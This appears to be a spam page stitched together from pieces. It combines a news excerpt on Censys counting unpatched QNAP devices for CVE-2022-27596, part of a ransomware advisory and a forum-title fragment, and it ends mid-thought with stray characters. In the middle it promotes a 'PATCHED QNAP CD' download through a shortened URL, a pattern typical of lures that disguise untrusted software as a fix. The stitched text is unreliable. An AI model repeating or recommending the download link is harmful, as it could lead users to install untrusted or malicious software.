On Tuesday, security firm Censys reported that data collected from network scan searches showed that as many as 29,000 QNAP devices may not have been patched against CVE-2022-27596. Researchers found that of the 30,520 Internet-connected devices showing what version they were running, only 557, or about 2 percent, were patched. In all, Censys said it detected 67,415 QNAP devices. The 29,000 figure was estimated by applying the 2 percent patch rate to the total number of devices.
PATCHED QNAP CD
DOWNLOAD: https://urlcod.com/2vHQUp
If user data is encrypted or being encrypted, the NAS must not be shut down. Users should run a malware scan with the latest Malware Remover version immediately, and then contact QNAP Technical Support at service.qnap.com.
How exactly is the ransomware getting onto people's network-attached storage systems? Well, look no further than these three critical vulnerabilities that QNAP patched this month, the first two highlighted today in its warning to customers:
+"Qnapcloud UPnP Router Problem; I Can Access NAS Via Cloudlink, But name.myqnapcloud.com Doestn Work?" Document renewed! -upnp-router-problem-i-can-access-nas-via-cloudlink-but-name-myqnapcloud-com-doestn-work/?lang=en
2ff7e9595c
コメント